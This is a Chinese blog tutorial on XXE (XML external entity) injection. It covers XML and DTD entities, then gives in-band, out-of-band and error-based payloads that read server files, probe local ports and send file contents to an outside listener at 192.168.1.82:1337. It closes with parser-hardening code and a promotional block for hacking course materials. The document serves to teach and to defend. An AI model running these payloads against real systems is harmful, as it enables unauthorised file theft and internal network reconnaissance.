xxe攻击的原理至利用,从零基础到精通,收藏这篇就够了!

于 2025-04-24 16:24:11 发布
阅读量704 收藏 16
点赞数 12
CC 4.0 BY-SA版权
文章标签: 网络 安全 网络安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Libra1313/article/details/147481561

XXE 漏洞:不仅仅是XML解析那么简单

XML外部实体注入 (XXE),这玩意儿说白了,就是应用程序解析XML输入的时候,没把外部实体加载这道门给焊死。结果呢?攻击者就能偷偷摸摸地加载任意外部文件,轻则读取敏感信息,重则直接给你来个命令执行,甚至还能扫描内网端口、攻击内网网站,搞不好还能发起拒绝服务攻击 (DoS)。这可不是闹着玩的!

等等,啥是XML?

XML,这是一种标记语言,但它和HTML的用途可不一样。HTML是用来展示数据的,而XML,它的核心使命是传输和存储数据。

<?xml version="1.0" encoding="UTF-8"?>
<person>
  <name>john</name>
</person>

第一行是XML文档的声明,有时候可以省略。<person>是根元素标签,这玩意儿可不像HTML那样标签是固定的,XML标签你可以根据需求自定义(注意大小写敏感)。name是子元素标签,标签必须成对出现。

关键点来了!XML文档里不能直接包含 < > " ' 这些特殊字符,因为它们会干扰XML解析器的正常工作。为了解决这个问题,XML引入了“实体”的概念。

实体就像是变量的快捷方式,可以用来引用普通文本或特殊字符。它不仅能存储数值,还能从本地或远程文件里读取数据,供后续引用。

实体这玩意儿,你就可以把它想象成编程语言里的变量,可以赋值,还能在代码的各个地方引用。实体在XML文档的DTD部分定义,就像这样:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE person [
  <!ENTITY name "gouzi">  // 定义一个实体name,值为gouzi
]>
<person>
  <name>&name;</name>  // <name>gouzi</name>
</person>

DTD的作用是定义XML文档包含哪些模块,以及这些模块里有哪些内容。

<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>

重点在于,实体部分可以加载外部实体,这也就意味着,在可以控制XML输入的地方,就可能存在XXE漏洞。

实体主要有三种:

  1. 一般实体:
<!ENTITY name "gouzi">
……
<name>&name;</name>

在DTD中定义,在XML中引用,调用方式是 &实体名;

  1. 参数实体:
<!ENTITY % data "<!ENTITY % name 'gouzi'>">
%data;  //<!ENTITY % name 'gouzi'>">

只能在DTD中引用,引用方式是 %实体名;,可以使用参数实体引用其他实体。

  1. 预定义实体:

XML预先定义好的一些特殊符号,比如:

实体不仅可以存储数据,还可以从本地或远程读取数据,这就是内部实体和外部实体的区别。

内部实体声明:

<!ENTITY 实体名称 "实体的值">

<!ENTITY name "gouzi">
……
<name>&name;</name>

外部实体声明:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
  <!ENTITY test SYSTEM "1.txt"> ]>
<creds>&test;</creds>

通过关键字 SYSTEM 定义一个外部实体 test,存储的是 1.txt 文件的内容。

关键在于,这里的 1.txt 可以替换成协议,支持的协议包括:

XXE攻击手法大揭秘:花式利用,总有一款适合你

XXE攻击主要分为三种类型:带内 (inband)、基于错误 (error-based) 和带外 (OOB)。

上面的例子就属于带内,可以直接在屏幕上看到结果:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
  <!ENTITY test SYSTEM "file:///c:/windows/system.ini"> ]>
<creds>&test;</creds>


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
  <!ENTITY test SYSTEM "c:/windows/system.ini"> ]>
<creds>&test;</creds>


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
  <!ENTITY test SYSTEM "http://127.0.0.1:81/xxe/1.txt"> ]>
<creds>&test;</creds>

看到了吧?用不同的协议都可以读取文件。

前面提到过,XML文档里不能直接包含 < 之类的字符,否则会报错,比如:

解决办法有两个:

  1. 使用PHP协议进行编码(PHP限定):

根据PHP官方文档,可以使用PHP协议进行编码:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<creds>&test;</creds>

注意:这种方法有局限性,因为XML在各种语言中都有应用。

  1. 使用 CDATA

根据XML官方文档,XML有一种叫做 CDATA 的结构:

CDATA 表示字符数据(character data)。CDATA 是不会被解析器解析的文本。在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开。

简单来说,CDATA 里的 <> 之类的字符不会被解析,也就不会干扰XML的正常解析。

CDATA 的语法是:

<![CDATA[  // 开始
<text>
]]>  // 结束

构造后的payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY start "<![CDATA[">
<!ENTITY test SYSTEM "xxe.php">
<!ENTITY end "]]>">
]>
<creds>&start;&test;&end;</creds>

理论上会变成 <creds><![CDATA[ 文件内容 ]]></creds>,但这种构造不符合XML规范:标签必须在同一个实体中闭合。

所以可以使用参数实体:

最终构造结果:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY % start "<![CDATA[">
<!ENTITY % test SYSTEM "http://127.0.0.1:81/xxe/xxe.php">
<!ENTITY % end "]]>">
<!ENTITY % zuhe "<!ENTITY all '%start;%test;%end;'>">
%zuhe;
]>

但这种构造容易出现以下错误:

也就是说,禁止在实体内部引用实体(禁止套娃?)。

那就构造外部DTD文件:

需要上传以下DTD文件:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%test;%end;">

构造payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY % start "<![CDATA[">
<!ENTITY % test SYSTEM "xxe.php">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "evil2.dtd">
%dtd; ]>

<creds>&all;</creds>

除了读取文件,XXE还可以用于端口探测:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY test SYSTEM "http://127.0.0.1:81"> ]>
<creds>&test;</creds>

比如报错 403,说明端口开放。再比如探测 8378 端口:

OOB(带外):

如果网页没有回显,可以通过DTD访问远程文件的方式把数据带出。

构造以下DTD文件:

<!ENTITY % passwd SYSTEM "E:/study/code/xxe/1.txt">
<!ENTITY % int "<!ENTITY send SYSTEM 'http://192.168.1.82:1337/?%passwd;'>">

在服务器 192.168.1.82 监听 1337 端口,构造以下payload:

<!DOCTYPE creds [
<!ENTITY % remote SYSTEM "evil1.dtd">
%remote;%int;%send;
]>
<creds>&send;</creds>

上面的利用结合了“套娃”的思想。

<?xml version="1.0" ?>
<!DOCTYPE creds [
 <!ENTITY % test '
 <!ENTITY &#x25; file SYSTEM "1.txt">
 <!ENTITY &#x25; error "<!ENTITY &#x26;#x25; send SYSTEM &#x27;http://192.168.1.82:1337/&#x25;file;&#x27;>">
 &#x25;error;
 &#x25;send;
'>
 %test;
]>

Error-based(基于错误):

当既不能显示,也不能连接外部网络时,可以使用报错。这种方法类似于SQL注入中的盲注,都是把想要的信息以报错的形式显示出来。

XXE的报错思路是,先把想要的信息弄出来,然后让后面的语句报错。

比如下面用 file:// 读取不存在的文件,也可以换成 http:// 访问不存在的地址。

构造DTD文件:

<!ENTITY % file SYSTEM "1.txt">
<!ENTITY % error "<!ENTITY &#x25; send SYSTEM 'file:///dddd/%file;'>">
%error;
%send;

Payload:

<?xml version="1.0" ?>
<!DOCTYPE creds [
 <!ENTITY % test SYSTEM "error.dtd">
 %test;
]>

两者结合一下,还可以使用下面的payload:

<?xml version="1.0" ?>
<!DOCTYPE creds [
 <!ENTITY % test '
 <!ENTITY &#x25; file SYSTEM "1.txt">
 <!ENTITY &#x25; error "<!ENTITY &#x26;#x25; send SYSTEM &#x27;file:///dddddd/&#x25;file;&#x27;>">
 &#x25;error;
 &#x25;send;
'>
 %test;
]>
<creds></creds>

如何防御XXE攻击?亡羊补牢,犹未晚矣!

最有效的防御方法是禁用外部实体:

  1. PHP:
libxml_disable_entity_loader(true);
  1. Java:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);
  1. Python:
from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

总结:XXE,你学会了吗?

本文深入剖析了XXE漏洞的原理,从XML的结构入手,介绍了实体的概念、分类和作用,以及DTD的组成和作用,并进一步讲解了DTD在XXE中的应用,例如文件探测、内容传输等。

通过XML中不同模块的功能,对文件读取进行了扩展利用,例如使用CDATA和PHP协议读取包含特殊字符的文件。

如果在利用过程中遇到问题,可以尝试“套娃”思想进行嵌套,如果报错,就把 < ' 之类的字符进行实体化编码。总而言之,XXE漏洞的利用需要灵活变通,才能达到最终目的。
```

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

黑客大白
关注
【Burp入门第十九】使用BurpSuite实现XXE+点击劫持+实战案例
等风来
04-07 2353
XXE漏洞的原理攻击者通过注入特殊的XML实体来引用外部资源,比如本地文件系统中的文件。从而读取服务器上的敏感文件。如何发现点击劫持漏洞:Burp主动扫描(步骤与XXE操作相同,不再详述)下面展示如何实现点击劫持。【1】Burp主动扫描。
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1969
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
XXE攻击揭秘
07-22
图文并茂的介绍了OWASP TOP 10中的 XXE攻击,非常具有可读性
原理到实战,详解XXE攻击,从零基础精通收藏了!
最新发布
mmquangefafafa的博客
02-22 931
常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。当xml解析器支持对于外部实体的解析且待解析的xml文件可由外部控制时,就会发生此攻击。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。执行结果:如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储。
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
XXE原理
weixin_48421613的博客
09-03 787
XEE漏洞 XXE(XML External Entity Injection)外部实体注入漏洞,XML在引用外部实体是时候,攻击者可以构造恶意的XML代码,以造成任意文件读取、命令执行甚至是中断服务器。 XML是一种是分流行的标记语言,他和HTML区别就是被设计用来传输、存储数据使用。 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标
XXE攻击指什么?其攻击原理是什么?
oldboyedu1的博客
02-13 927
也就是说服务端接收和解析了来自用户端的XML数据,而又没有做严格的安全控制,从而导致XML外部实体注入,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。XXE攻击是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XXE攻击原理是什么?
XXE - How to become a Jedi
02-20
### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它发生在应用程序解析 XML 数据时,未能正确过滤外部实体引用的情况。当一个恶意构造的 XML 文档被传入到易受...
什么是CSRF?CSRF漏洞原理攻击与防御(非常详细)零基础入门到精通收藏这一
xiangxue888的博客
09-09 1843
什么是CSRF?CSRF漏洞原理攻击与防御(非常详细)零基础入门到精通收藏这一
图解Transformer工作原理(非常详细)零基础入门到精通收藏这一
nuoyan_7的博客
08-22 1098
Transformer 已经成为了前沿人 AI 技术的代名词,尤其是在自然语言处理(NLP)这一领域。那么,是什么使得 Transformer 能如此高效准确地掌握语言的复杂性呢?让我们一起深入探索 Transformer 架构的核心原理。但在此之前,不妨先看看它的应用场景。谷歌翻译:这个被广泛使用的工具在很大程度上依靠 Transformer 技术,实现了对超过 100 种语言的快速准确翻译。它能考虑到整个句子的上下文,而非仅仅是单个词语,使得翻译结果更加自然流畅。
XXE漏洞原理
weixin_44843084的博客
05-20 628
XXE漏洞原理 XXE(外部实体注入)是XML外部实体注入。 当应用程序允许引用外部实体时,通过XXE攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等。 常规的POST的content-type为application/x-www-form-urlencoded,但只要将其修改为application/json,就可以传入json格式的POST数据,修改为application/xml,就可以传入XML格式的数据。常规的WAF一般只检测application/x-www-form-urle
xxe原理利用
hackzkaq的博客
03-09 795
零基础学黑客,搜索公众号:白帽子左一 什么是xxe XML External Entity Injection 外部实体注入,该漏洞发生在应用程序解析XML输入时, 没有禁止外部实体的加载,导致可加载任意外部文件,造成文件读取、命令执行(有点极端)、内网端口扫描、攻击内网网站、发起dos攻击等危害。 什么是xml 一种标记语言,被设计用来传输和存储数据(html是用来显示数据): <?xml version="1.0" encoding="UTF-8"?> <person> &l
XML 基础知识 && XXE 漏洞原理解析及实验(基础
Jinmindong
02-16 1292
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
XXE(xml外部实体攻击)
HoYim
04-11 4578
1、概念 XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
【全网最详细】XXE漏洞详解
2301_79455190的博客
12-10 2683
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。XXE漏洞产生在外部实体主要有4个利用方向:文件读取,命令执行,DOS攻击,SSRF按照有无回显可以分为两大类无回显可以加载外部实体,返回数据到我们Vps上;或者加载本地实体报错回显本文转自allv100,如有侵权,请联系删除。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
XXE原理简介、防御方案
qq_37432174的博客
11-24 6676
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
网络安全进阶学习第二十一课——XXE
p36273的博客
11-02 1613
外部实体注入攻击。XML介绍。
XXE是什么?XXE漏洞原理及案例讲解(从0到1完全掌握XXE
热门推荐
白帽黑客八哥的博客
12-14 1万+
XXE(XML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。XML文档可以定义实体,它们是存储文档中其他地方重复使用的数据的方式。外部实体是一种特殊类型的实体,它们的内容被定义在XML文档外部。XXE漏洞发生在当应用程序解析含有外部实体引用的XML文档时,没有正确地限制或禁止这些外部实体的使用。XXE是一种严重的安全漏洞,它的存在可能导致严重的安全风险。开发人员和安全专家必须了解此类漏洞的工作原理,确保在处理XML数据时采取适当的安全措施,以保护应用程序和数据的安全
什么是XXE攻击?如何进行防护
HoewDec的博客
04-19 2043
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。SSRF在攻击中扮演了中间者的角色,有时候直接攻击无法成效,通过SSRF可以利用其他主机的漏洞,攻击目标。安全性很难做到正确,即使在当今具有安全意识的世界中,也存在一些严重的漏洞,例如 XML 外部实体 (XXE),它们被忽视并最终成为破坏的原因。攻击者通常在XML文档中嵌入恶意的外部实体引用,当XML解析器处理这些文档时,会触发对外部资源的访问,进而执行攻击者指定的恶意操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值